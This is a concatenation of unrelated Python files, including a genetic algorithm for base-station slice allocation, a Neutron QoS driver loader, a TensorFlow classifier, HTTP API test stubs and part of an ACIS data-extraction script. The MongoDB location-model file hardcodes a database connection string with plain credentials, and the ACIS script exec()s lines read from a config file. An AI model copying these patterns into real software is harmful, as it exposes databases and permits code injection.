rbsc_realtime[bs_of_select][1] -= sr[j][1]
rbsc_realtime[bs_of_select][2] -= sr[j][2]
flag = 1
break
# 随机探查失败,则遍历所有基站,找到一个有足够资源可以映射的基站
if flag == 0:
for bs_of_select in range(n):
if sr[j][0] < rbsc_realtime[bs_of_select][0] and sr[j][1] < rbsc_realtime[bs_of_select][1] and \
sr[j][2] < rbsc_realtime[bs_of_select][2]:
chromosome[j][bs_of_select] = 1
rbsc_realtime[bs_of_select][0] -= sr[j][0]
rbsc_realtime[bs_of_select][1] -= sr[j][1]
rbsc_realtime[bs_of_select][2] -= sr[j][2]
flag = 1
break
if flag == 0:
continue
# 将产生的染色体加入到chromosomes_list中
chromosomes_list.append(chromosome)
chromosomes = np.array(chromosomes_list)
return chromosomes
# 得到个体的适应度值(包括带宽和计算的代价)及每个个体被选择的累积概率
def getFitnessValue(sr, rbsc, chromosomes, delta):
populations, m, n = np.shape(chromosomes)
# 定义适应度函数,每一行代表一个染色体的适应度,每行包括四部分,分别为:带宽代价、计算代价、总代价、选择概率、累计概率
fitness = np.zeros((populations, 6))
for i in range(populations):
# 取出来第i个染色体
rbsc_realtime = np.array(rbsc)
chromosome = chromosomes[i]
cost_of_down_bandwidth = 0
cost_of_up_bandwidth = 0
cost_of_computing = 0
for j in range(m):
for k in range(n):
if chromosome[j][k] == 1:
cost_of_down_bandwidth += sr[j][0] / (rbsc_realtime[k][0] + delta)
cost_of_up_bandwidth += sr[j][1] / (rbsc_realtime[k][1] + delta)
cost_of_computing += sr[j][2] / (rbsc_realtime[k][2] + delta)
rbsc_realtime[k][0] -= sr[j][0]
rbsc_realtime[k][1] -= sr[j][1]
rbsc_realtime[k][2] -= sr[j][2]
break
fitness[i][0] = cost_of_down_bandwidth
fitness[i][1] = cost_of_up_bandwidth
fitness[i][2] = cost_of_computing
fitness[i][3] = cost_of_down_bandwidth + cost_of_up_bandwidth + cost_of_computing
# 计算被选择的概率
sum_of_fitness = 0
if populations > 1:
for i in range(populations):
sum_of_fitness += fitness[i][3]
for i in range(populations):
fitness[i][4] = (sum_of_fitness - fitness[i][3]) / ((populations - 1) * sum_of_fitness)
else:
fitness[0][4] = 1
fitness[:, 5] = np.cumsum(fitness[:, 4])
return fitness
# 选择算子
def selectNewPopulation(chromosomes, cum_probability):
populations, m, n = np.shape(chromosomes)
newpopulation = np.zeros((populations, m, n), dtype=int)
# 随机产生populations个概率值
randoms = np.random.rand(populations)
for i, randoma in enumerate(randoms):
logical = cum_probability >= randoma
index = np.where(logical == 1)
# index是tuple,tuple中元素是ndarray
newpopulation[i, :, :] = chromosomes[index[0][0], :, :]
return newpopulation
pass
# 新种群交叉
def crossover(sr, rbsc, population, pc=0.8):
"""
:param rbsc:
:param sr:
:param population: 新种群
:param pc: 交叉概率默认是0.8
:return: 交叉后得到的新种群
"""
# 根据交叉概率计算需要进行交叉的个体个数
populations, m, n = np.shape(population)
# m, n = population.shape
numbers = np.uint8(populations * pc)
# 确保进行交叉的染色体个数是偶数个
if numbers % 2 != 0:
numbers += 1
# 交叉后得到的新种群
updatepopulation = np.zeros((populations, m, n), dtype=int)
# 产生随机索引
index = random.sample(range(populations), numbers)
# 不进行交叉的染色体进行复制
for i in range(populations):
if not index.__contains__(i):
updatepopulation[i, :, :] = population[i, :, :]
# crossover
while len(index) > 0:
a = index.pop()
b = index.pop()
# 随机探测m/2个位置
for i in range(math.ceil(m / 2)):
# 随机产生一个交叉点
crossoverPoint = random.sample(range(1, m), 1)
crossoverPoint = crossoverPoint[0]
# one-single-point crossover
updatepopulation[a, 0:crossoverPoint, :] = population[a, 0:crossoverPoint, :]
updatepopulation[a, crossoverPoint:, :] = population[b, crossoverPoint:, :]
updatepopulation[b, 0:crossoverPoint, :] = population[b, 0:crossoverPoint, :]
updatepopulation[b, crossoverPoint:, :] = population[a, crossoverPoint:, :]
if check(sr, rbsc, updatepopulation[a]) and check(sr, rbsc, updatepopulation[b]):
break
else:
updatepopulation[a, 0:crossoverPoint, :] = population[a, 0:crossoverPoint, :]
updatepopulation[a, crossoverPoint:, :] = population[b, crossoverPoint:, :]
updatepopulation[b, 0:crossoverPoint, :] = population[b, 0:crossoverPoint, :]
updatepopulation[b, crossoverPoint:, :] = population[a, crossoverPoint:, :]
return updatepopulation
pass
# 染色体变异
def mutation(sr, rbsc, population, pm=0.01):
"""
:param rbsc:
:param sr:
:param population: 经交叉后得到的种群
:param pm: 变异概率默认是0.01
:return: 经变异操作后的新种群
"""
updatepopulation = np.copy(population)
populations, m, n = np.shape(population)
# 计算需要变异的基因个数
gene_num = np.uint8(populations * m * n * pm)
# 将所有的基因按照序号进行10进制编码,则共有populations * m个基因
# 随机抽取gene_num个基因进行基本位变异
mutationGeneIndex = random.sample(range(0, populations * m * n), gene_num)
# 确定每个将要变异的基因在整个染色体中的基因座(即基因的具体位置)
for gene in mutationGeneIndex:
# 确定变异基因位于第几个染色体
chromosomeIndex = gene // (m * n)
# 确定变异基因位于当前染色体的第几个基因位
geneIndex = gene % (m * n)
# 确定在染色体矩阵哪行
sr_location = geneIndex // n
# 确定在染色体矩阵哪行
bs_location = geneIndex % n
# mutation
chromosome = np.array(population[chromosomeIndex])
if chromosome[sr_location, bs_location] == 0:
for i in range(n):
chromosome[sr_location, i] = 0
chromosome[sr_location, bs_location] = 1
else:
chromosome[sr_location, bs_location] = 0
j = random.randint(0, n - 1)
chromosome[sr_location, j] = 1
if check(sr, rbsc, chromosome):
updatepopulation[chromosomeIndex] = np.copy(chromosome)
return updatepopulation
pass
# 得到个体的适应度值(包括带宽和计算的代价)及每个个体被选择的累积概率
def update_rbsc(sr, rbsc, solution):
m, n = np.shape(solution)
rbsc_realtime = np.array(rbsc)
chromosome = solution
for j in range(m):
for k in range(n):
if chromosome[j][k] == 1:
rbsc_realtime[k][0] -= sr[j][0]
rbsc_realtime[k][1] -= sr[j][1]
rbsc_realtime[k][2] -= sr[j][2]
break
return rbsc_realtime
def ga(SR, RBSC, max_iter=500, delta=0.0001, pc=0.8, pm=0.01, populationSize=10):
# 每次迭代得到的最优解
optimalSolutions = []
optimalValues = []
# 得到初始种群编码
chromosomes = getInitialPopulation(SR, RBSC, populationSize)
for iteration in range(max_iter):
# 得到个体适应度值和个体的累积概率
fitness = getFitnessValue(SR, RBSC, chromosomes, delta)
# 选择新的种群
cum_proba = fitness[:, 5]
newpopulations = selectNewPopulation(chromosomes, cum_proba)
# 进行交叉操作
crossoverpopulation = crossover(SR, RBSC, newpopulations, pc)
# mutation
mutationpopulation = mutation(SR, RBSC, crossoverpopulation, pm)
# 适应度评价
fitness = getFitnessValue(SR, RBSC, mutationpopulation, delta)
# 搜索每次迭代的最优解,以及最优解对应的目标函数的取值
optimalValues.append(np.min(list(fitness[:, 3])))
index = np.where(fitness[:, 3] == min(list(fitness[:, 3])))
optimalSolutions.append(mutationpopulation[index[0][0], :, :])
chromosomes = mutationpopulation
# 搜索最优解
optimalValue = np.min(optimalValues)
print("progress\n")
print(optimalValues)
optimalIndex = np.where(optimalValues == optimalValue)
optimalSolution = optimalSolutions[optimalIndex[0][0]]
# iter = range(max_iter)
# plt.plot(iter, optimalValues)
# plt.show()
return optimalSolution, optimalValue
if __name__ == '__main__':
# BSC:base station capacity
# RBSC: residuary base station capacity
# SR: slice request
# 模拟3个基站,每个基站拥有1000的带宽能力,1000的计算能力,size为N
BSC = np.array([[10, 10, 10], [10, 10, 10], [10, 10, 10]], dtype=np.float)
# 初始时,只有剩余矩阵就是整个基站的资源
rbsc = np.array(BSC)
# 模拟一组切片请求,包含几类,如带宽密集型、计算密集型,size为M
SR_MODEL = np.array(
[[1 / 16, 5 / 16, 10 / 16], [1 / 16, 10 / 16, 5 / 16], [5 / 16, 1 / 16, 10 / 16], [5 / 16, 10 / 16, 1 / 16],
[10 / 16, 1 / 16, 5 / 16], [10 / 16, 5 / 16, 1 / 16]])
max_iter = 500
delta = 0
pc = 0.8
pm = 0.01
populationSize = 20
# 构造10次请求
request_num = 10
values = np.zeros((request_num), dtype=np.float)
solutions = []
for iter in range(request_num):
# 随机构造每次请求的切片数
m = random.randint(8, 10)
sr = np.zeros((m, 3), dtype=np.float)
# 构造m个切片请求
for i in range(m):
j = random.randint(0, 5)
sr[i] = SR_MODEL[j]
solution, value = ga(sr, rbsc, max_iter, delta, pc, pm, populationSize)
rbsc = update_rbsc(sr, rbsc, solution)
print('最优目标函数值:', value)
values[iter] = value
print('solution:')
print(solution)
solutions.append(np.copy(solution))
print("总结果")
print(values)
# ##验证
# m, n = np.shape(solution)
# chromosomes = np.zeros((1, m, n))
# chromosomes[0] = solution
# f1 = sum(solution)
# print("number of support each bs:", f1)
# new_rbsc = update_rbsc(SR, RBSC, solution)
# print("new_rbsc:")
# print(new_rbsc)
# f = getFitnessValue(SR, RBSC, chromosomes, delta)
# print(f)
|
program = [
{'mode': 'sweep', 'start': 8.9, 'stop': 7.6, 'dt': 10, 'nsteps': 1000},
{'mode': 'single', 'freq': 80, 'ampl': 0, 'phase': 0},
# {'mode': 'sweep', 'start': 10.7, 'stop': 8.7, 'dt': 10, 'nsteps': 1000},
# {'mode': 'sweep', 'start': 80, 'stop': 80.1, 'dt': 0.1}
# {'mode': 'single', 'freq': 0, 'ampl': 0, 'phase': 0},
]
profiles = [
{'profile': 0, 'freq': 0, 'ampl': 0, 'phase': 0},
{'profile': 1, 'freq': 0, 'ampl': 0, 'phase': 0},
{'profile': 2, 'freq': 0, 'ampl': 0, 'phase': 0},
{'profile': 3, 'freq': 0, 'ampl': 0, 'phase': 0},
{'profile': 4, 'freq': 0, 'ampl': 0, 'phase': 0},
{'profile': 5, 'freq': 0, 'ampl': 0, 'phase': 0},
{'profile': 6, 'freq': 0, 'ampl': 0, 'phase': 0},
{'profile': 7, 'freq': 0, 'ampl': 0, 'phase': 0},
]
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from neutron.i18n import _LI
from neutron import manager
QOS_DRIVER_NAMESPACE = 'neutron.qos.notification_drivers'
QOS_PLUGIN_OPTS = [
cfg.ListOpt('notification_drivers',
default='message_queue',
help=_('Drivers list to use to send the update notification')),
]
cfg.CONF.register_opts(QOS_PLUGIN_OPTS, "qos")
LOG = logging.getLogger(__name__)
class QosServiceNotificationDriverManager(object):
def __init__(self):
self.notification_drivers = []
self._load_drivers(cfg.CONF.qos.notification_drivers)
def update_policy(self, context, qos_policy):
for driver in self.notification_drivers:
driver.update_policy(context, qos_policy)
def delete_policy(self, context, qos_policy):
for driver in self.notification_drivers:
driver.delete_policy(context, qos_policy)
def create_policy(self, context, qos_policy):
for driver in self.notification_drivers:
driver.create_policy(context, qos_policy)
def _load_drivers(self, notification_drivers):
"""Load all the instances of the configured QoS notification drivers
:param notification_drivers: comma separated string
"""
if not notification_drivers:
raise SystemExit(_('A QoS driver must be specified'))
LOG.debug("Loading QoS notification drivers: %s", notification_drivers)
for notification_driver in notification_drivers:
driver_ins = self._load_driver_instance(notification_driver)
self.notification_drivers.append(driver_ins)
def _load_driver_instance(self, notification_driver):
"""Returns an instance of the configured QoS notification driver
:returns: An instance of Driver for the QoS notification
"""
mgr = manager.NeutronManager
driver = mgr.load_class_for_provider(QOS_DRIVER_NAMESPACE,
notification_driver)
driver_instance = driver()
LOG.info(
_LI("Loading %(name)s (%(description)s) notification driver "
"for QoS plugin"),
{"name": notification_driver,
"description": driver_instance.get_description()})
return driver_instance
|
x = int(input())
halved_x = x >> 1
print('integer halved is {}'.format(halved_x))
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os.path
from typing import Iterable
from pants.core.util_rules.config_files import ConfigFilesRequest
from pants.core.util_rules.external_tool import TemplatedExternalTool
from pants.engine.platform import Platform
from pants.option.option_types import ArgsListOption, BoolOption, SkipOption
from pants.util.strutil import softwrap
class Shellcheck(TemplatedExternalTool):
options_scope = "shellcheck"
name = "Shellcheck"
help = "A linter for shell scripts."
default_version = "v0.8.0"
default_known_versions = [
"v0.8.0|macos_arm64 |e065d4afb2620cc8c1d420a9b3e6243c84ff1a693c1ff0e38f279c8f31e86634|4049756",
"v0.8.0|macos_x86_64|e065d4afb2620cc8c1d420a9b3e6243c84ff1a693c1ff0e38f279c8f31e86634|4049756",
"v0.8.0|linux_arm64 |9f47bbff5624babfa712eb9d64ece14c6c46327122d0c54983f627ae3a30a4ac|2996468",
"v0.8.0|linux_x86_64|ab6ee1b178f014d1b86d1e24da20d1139656c8b0ed34d2867fbb834dad02bf0a|1403852",
]
default_url_template = (
"https://github.com/koalaman/shellcheck/releases/download/{version}/shellcheck-"
"{version}.{platform}.tar.xz"
)
default_url_platform_mapping = {
"macos_arm64": "darwin.x86_64",
"macos_x86_64": "darwin.x86_64",
"linux_arm64": "linux.aarch64",
"linux_x86_64": "linux.x86_64",
}
skip = SkipOption("lint")
args = ArgsListOption(example="-e SC20529")
config_discovery = BoolOption(
default=True,
advanced=True,
help=softwrap(
"""
If true, Pants will include all relevant `.shellcheckrc` and `shellcheckrc` files
during runs. See https://www.mankier.com/1/shellcheck#RC_Files for where these
can be located.
"""
),
)
def generate_exe(self, _: Platform) -> str:
return f"./shellcheck-{self.version}/shellcheck"
def config_request(self, dirs: Iterable[str]) -> ConfigFilesRequest:
# Refer to https://www.mankier.com/1/shellcheck#RC_Files for how config files are
# discovered.
candidates = []
for d in ("", *dirs):
candidates.append(os.path.join(d, ".shellcheckrc"))
candidates.append(os.path.join(d, "shellcheckrc"))
return ConfigFilesRequest(discovery=self.config_discovery, check_existence=candidates)
|
a = [1, 2, 3, 4, 5, 6, 7]
i = 0
while(a[i] <= 5):
print(a[i])
i = i + 1
print("hello")
a = 5
if(a % 2 == 0):
print("even no")
else:
print("odd no")
i = 4
if (i == 1):
print("sparsh")
elif (i == 2):
print("prabal")
elif(i == 3):
print("dhruv")
else:
print("sorry")
|
import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.layers import Dense, Flatten, Conv2D
from constants import nb_class
class Classifier(Model):
def __init__(self):
super(Classifier, self).__init__()
self.conv1 = Conv2D(6, kernel_size=(3, 3), strides=(2, 2), activation="relu", padding="same")
self.flat1 = Flatten()
self.dense1 = Dense(32, activation="relu")
self.dense_logits = Dense(nb_class, activation="linear")
def call(self, feature_areas):
output = []
for fa in feature_areas:
x = self.conv1(fa)
x = self.flat1(x)
x = self.dense1(x)
logits = self.dense_logits(x)
output.append(tf.gather(logits, 0))
output = tf.convert_to_tensor(output)
return output
|
import csv
import uuid
import pymongo
import geopy.distance
client = pymongo.MongoClient(
"mongodb+srv://admin:adminadmin@cluster0-dhc2n.mongodb.net/test?retryWrites=true&w=majority")
db_posts = client.test_database.posts
class LocationModel:
@staticmethod
def get_pin(args): # args: _id (pin id)
# returns the park name, lat and long of pin
dummy_pin = args["_id"]
pin = db_posts.find({"_id": dummy_pin}).next()
return pin.get("park"), pin.get("latitude"), pin.get("longitude")
@staticmethod
def get_pins(args):
# returns the names and coordinates of landmarks within 25 km of user
# return format tuple: (name, (latitude, longitude))
name = ""
max_dist = 100 # km
within_max_dist_lst = []
user_coords = (args["latitude"], args["longitude"])
custom_coords = db_posts.find({"park": args["parkId"], "custom": True}) # grabs all user-created landmarks in park
for loc in custom_coords:
loc_coords = (loc.get("latitude"), loc.get("longitude"))
dist = geopy.distance.distance(user_coords, loc_coords).km
if dist < max_dist:
within_max_dist_lst.append(loc_coords)
return {"pins": within_max_dist_lst}
@staticmethod
def get_closest_park(args): # args: latitude, longitude, radius
# gets the closest park in order to determine which pins to get
latitude = args["latitude"]
longitude = args["longitude"]
radius = args["radius"]
parks = []
dists = []
pparks = db_posts.find({"custom": False})
for ppark in pparks:
ppark_coords = (ppark.get("latitude"), ppark.get("longitude"))
dist = geopy.distance.distance((latitude, longitude), ppark_coords)
if dist <= radius:
parks.append(ppark.get("_id"))
dists.append(dist)
if len(parks) == 1:
return parks[0]
elif len(parks) > 1:
return parks[dists.index(min(dists))]
else:
args["radius"] += 50
return LocationModel.get_closest_park(args)
@staticmethod
def populate(): # should only be called once
# populates the db with national parks
with open("nat_parks.csv") as file:
reader = csv.reader(file, delimiter = ",")
for row in reader:
if (row[0] == "Name"):
continue
post = {"_id": row[0],
"latitude": row[1],
"longitude": row[2],
"custom": False,
}
db_posts.insert_one(post)
@staticmethod
def add_pin(args): # args: park, latitude, longitude
# user_id references the "_id" from the User class
# users can add a pin (press + hold) to a national park to increase awareness
# hopefully can add a photo in the future
park = args["park"]
latitude = args["latitude"]
longitude = args["longitude"]
ppark = db_posts.find({"_id": park, "custom": False}).next()
ppark_coords = (ppark.get("latitude"), ppark.get("longitude"))
if geopy.distance.distance(ppark_coords, (latitude, longitude)).km < 550:
post = {"_id": uuid.uuid4(),
"park": park,
"latitude": latitude,
"longitude": longitude,
"custom": True,
}
db_posts.insert_one(post)
else:
raise {"error": "Outside park range.", "code": 401}
|
# -*- coding: utf-8 -*-
import urllib.request
import json
class DataTransferTestCase(object):
def __init__(self, url):
self.url = url
def set_message_push_config_test(self):
url = self.url + 'DataTransferSetMessagePushConfig'
jroot = {}
jroot['msg_code'] = 'valueType=long long'
postData = json.dumps(jroot)
print("test for set_message_push_config")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def set_webfilter_contents_test(self, path):
url = self.url + 'DataTransferSetWebfilterContents' + path
jroot = {}
jarray = list()
contents_0 = {}
contents_0['is_attr'] = 'valueType=bool'
contents_0['path'] = 'valueType=std::string'
contents_0['name'] = 'valueType=std::string'
contents_0['value'] = 'valueType=std::string'
jarray.append(contents_0)
contents_1 = {}
contents_1['is_attr'] = 'valueType=bool'
contents_1['path'] = 'valueType=std::string'
contents_1['name'] = 'valueType=std::string'
contents_1['value'] = 'valueType=std::string'
jarray.append(contents_1)
jroot['contents'] = jarray
postData = json.dumps(jroot)
print("test for set_webfilter_contents")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def get_message_push_config_test(self):
url = self.url + 'DataTransferGetMessagePushConfig'
print("test for get_message_push_config")
response = urllib.request.urlopen(url)
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def set_user_pay_function_test(self):
url = self.url + 'DataTransferSetUserPayFunction'
jroot = {}
jroot['user_name'] = 'valueType=std::string'
jroot['token'] = 'valueType=std::string'
jroot['func'] = 'valueType=std::string'
jroot['opcode'] = 'valueType=unsigned int'
postData = json.dumps(jroot)
print("test for set_user_pay_function")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def get_webfilter_config_test(self, path):
url = self.url + 'DataTransferGetWebfilterConfig' + path
jroot = {}
postData = json.dumps(jroot)
print("test for get_webfilter_config")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def get_conf_file_md5_test(self):
url = self.url + 'DataTransferGetConfFileMd5'
jroot = {}
jroot['file_path'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for get_conf_file_md5")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def set_webfilter_text_test(self, path):
url = self.url + 'DataTransferSetWebfilterText' + path
jroot = {}
jroot['name'] = 'valueType=std::string'
jroot['value'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for set_webfilter_text")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def notify_web_filter_conf_change_test(self):
url = self.url + 'DataTransferNotifyWebFilterConfChange'
jroot = {}
jroot['name'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for notify_web_filter_conf_change")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def query_user_pay_function_test(self):
url = self.url + 'DataTransferQueryUserPayFunction'
jroot = {}
jroot['user_name'] = 'valueType=std::string'
jroot['token'] = 'valueType=std::string'
jroot['func'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for query_user_pay_function")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def set_webfilter_attr_test(self, path):
url = self.url + 'DataTransferSetWebfilterAttr' + path
jroot = {}
jroot['attribute_name'] = 'valueType=std::string'
jroot['attribute_value'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for set_webfilter_attr")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def import_conf_test(self):
url = self.url + 'DataTransferImportConf'
jroot = {}
jroot['rule_path'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for import_conf")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def restore_default_config_test(self):
url = self.url + 'DataTransferRestoreDefaultConfig'
jroot = {}
jroot['file_name'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for restore_default_config")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def export_conf_test(self):
url = self.url + 'DataTransferExportConf'
jroot = {}
jroot['rule_path'] = 'valueType=std::string'
jroot['optional'] = 'valueType=unsigned int'
postData = json.dumps(jroot)
print("test for export_conf")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def add_webfilter_text_test(self, path):
url = self.url + 'DataTransferAddWebfilterText' + path
jroot = {}
jroot['name'] = 'valueType=std::string'
jroot['value'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for add_webfilter_text")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def get_webfilter_power_test(self):
url = self.url + 'DataTransferGetWebfilterPower'
jroot = {}
path = list()
path.append('valueType=std::string')
path.append('valueType=std::string')
jroot['path'] = path
postData = json.dumps(jroot)
print("test for get_webfilter_power")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def del_webfilter_config_by_xpath_test(self, path):
url = self.url + 'DataTransferDelWebfilterConfigByXpath' + path
jroot = {}
postData = json.dumps(jroot)
print("test for del_webfilter_config_by_xpath")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def fast_small_data_transfer_write_test(self):
url = self.url + 'DataTransferFastSmallDataTransferWrite'
jroot = {}
jroot['name'] = 'valueType=std::string'
jroot['data'] = 'valueType=unsigned char'
postData = json.dumps(jroot)
print("test for fast_small_data_transfer_write")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def set_webfilter_config_test(self, path):
url = self.url + 'DataTransferSetWebfilterConfig' + path
jroot = {}
jroot['op_code'] = 'valueType=unsigned int'
jroot['json_string'] = 'valueType=std::string'
postData = json.dumps(jroot)
print("test for set_webfilter_config")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
def set_webfilter_power_test(self):
url = self.url + 'DataTransferSetWebfilterPower'
jroot = {}
path = list()
path.append('valueType=std::string')
path.append('valueType=std::string')
jroot['path'] = path
conf_power = list()
conf_power.append('valueType=unsigned int')
conf_power.append('valueType=unsigned int')
jroot['conf_power'] = conf_power
postData = json.dumps(jroot)
print("test for set_webfilter_power")
print(postData)
response = urllib.request.urlopen(url, postData.encode('utf-8'))
recvData = response.read().decode('utf-8')
json.loads(recvData)
print(recvData)
if __name__ == "__main__":
obj = DataTransferTestCase("http://192.168.29.11:9090/")
obj.set_message_push_config_test()
obj.set_webfilter_contents_test()
obj.get_message_push_config_test()
obj.set_user_pay_function_test()
obj.get_webfilter_config_test()
obj.get_conf_file_md5_test()
obj.set_webfilter_text_test()
obj.notify_web_filter_conf_change_test()
obj.query_user_pay_function_test()
obj.set_webfilter_attr_test()
obj.import_conf_test()
obj.restore_default_config_test()
obj.export_conf_test()
obj.add_webfilter_text_test()
obj.get_webfilter_power_test()
obj.del_webfilter_config_by_xpath_test()
obj.fast_small_data_transfer_write_test()
obj.set_webfilter_config_test()
obj.set_webfilter_power_test()
|
# website for wordcloud: http://www.wordclouds.com/
import math
with open('website_WF.txt', 'r') as rf:
with open('website_WF_Optimized_Text.txt', 'w') as wf:
m = 0
for line in rf:
line = line.replace('\n', '')
line = line.split('\t')
line[0] = int(math.log(int(line[0]), 1.2))
if line[0] >= 5:
wf.write(str(line[0] * 2) + '\t' + str(line[1] + '\n'))
wf.close()
rf.close()
|
class NhpcDBException(Exception):
def __str__(self):
return self._msg
class NhpcDBInvalidProperty(NhpcDBException):
def __init__(self, props, data_type):
self._msg = "'%s' properties invalid, should be %s" % (" ".join(props), data_type)
class NhpcDBInvalidAttribute(NhpcDBException):
def __init__(self, classname, attrname):
self._msg = "'%s' attribute not implemented in '%s'" % (attrname, classname)
class NhpcDBFieldNotImplemented(NhpcDBException):
def __init__(self, classname):
self._msg = "'%s' field not implemented" % classname
class NhpcDBFieldRequired(NhpcDBException):
def __init__(self, classname, attrname):
self._msg = "'%s' field required for '%s'" % (classname, attrname)
class NhpcDBInvalidValue(NhpcDBException):
def __init__(self, classname, req_classname):
self._msg = "'%s' should be '%s'" % (classname, req_classname)
|
#!/usr/bin/env /data/mta/Script/Python3.6/envs/ska3/bin/python
#####################################################################################
# #
# get_data_for_month.py: get a month amount of data and update data files #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# Last Update: Apr 18, 2019 #
# #
#####################################################################################
import os
import os.path
import sys
import re
import string
import random
import operator
import math
import numpy
import astropy.io.fits as pyfits
import time
import unittest
#
#--- from ska
#
from Ska.Shell import getenv, bash
ascdsenv = getenv('source /home/ascds/.ascrc -r release', shell='tcsh')
#
#--- reading directory list
#
path = '/data/mta/Script/ACIS/Count_rate/house_keeping/dir_list_py'
f= open(path, 'r')
data = [line.strip() for line in f.readlines()]
f.close()
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
#
#--- append pathes to private folders to a python directory
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
#
#--- import several functions
#
import mta_common_functions as mcf
#
#--- temp writing file name
#
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
#-------------------------------------------------------------------------------
#--- get_data_for_month: extract one month amount of data and update data files
#-------------------------------------------------------------------------------
def get_data_for_month(year, month):
"""
extract one month amount of data and update data files
input: year --- year of the data
month --- month of the data
output: updated data files:
<MMM><YYYY>/ccd#
<MMM><YYYY>/ephin_data
Note: there is no ephin data after 2018 Nov
"""
#
#--- if the year/month are not given, extract data of the last month
#
if year == '':
out = time.strftime('%Y:%m' %time.gmtime)
atemp = re.split(':', out)
year = int(float(atemp[0]))
month = int(float(atemp[1]))
month -= 1
if month < 1:
month = 12
year -= 1
cmonth = mcf.change_month_format(month) #--- convert digit to letter month
ucmon = cmonth.upper()
dir_name = data_dir + '/' + ucmon + str(year) + '/' #--- output directory
if os.path.isdir(dir_name):
cmd = 'rm -rf ' + dir_name + '*'
else:
cmd = 'mkdir -p ' + dir_name
os.system(cmd)
#
#--- get acis count rate data
#
extract_acis_count_rate(year, month, dir_name)
#
#--- get ephin rate data; no data after Nov 2018
#
if year < 2018:
get_ephin_data(year, month, dir_name)
elif (year == 2018) and (month < 11):
get_ephin_data(year, month, dir_name)
#
#-- clean the data files
#
cleanUp(dir_name)
#------------------------------------------------------------------------------
#-- extract_acis_count_rate: extract acis count rate data --
#-------------------------------------------------------------------------------
def extract_acis_count_rate(year, month, dir_name):
"""
extract acis count rate data
input: year --- year
month --- month
dir_name --- output dir name
output: <dir_name>/ccd<#ccd>
"""
#
#--- make a list of data fits file
#
data_list = get_data_list_from_archive(year, month)
for ifile in data_list:
#
#--- extract the fits file with arc5gl
#
line = 'operation=retrieve\n'
line = line + 'dataset=flight\n'
line = line + 'detector=acis\n'
line = line + 'level=1\n'
line = line + 'filetype=evt1\n'
line = line + 'filename=' + ifile + '\n'
line = line + 'go\n'
run_arc5gl(line)
cmd = 'gzip -d ' + ifile + '.gz'
os.system(cmd)
#
#--- extract data and update/create the count rate data
#
extract_data(ifile, dir_name)
mcf.rm_files(ifile)
#-------------------------------------------------------------------------------
#-- get_data_list_from_archive: compare the current input list to the old one and select data
#-------------------------------------------------------------------------------
def get_data_list_from_archive(year, month):
"""
compare the current input list to the old one and select out the data which are not used
input: year --- year of the data set
month --- month of the data set
output: file_list --- a list of acis evt1 file list
"""
#
#--- set start and stop time of data extraction period (one month)
#
[start, stop] = set_start_stop_time(year, month)
#
#--- create data list with arc5gl
#
line = 'operation=browse\n'
line = line + 'dataset=flight\n'
line = line + 'detector=acis\n'
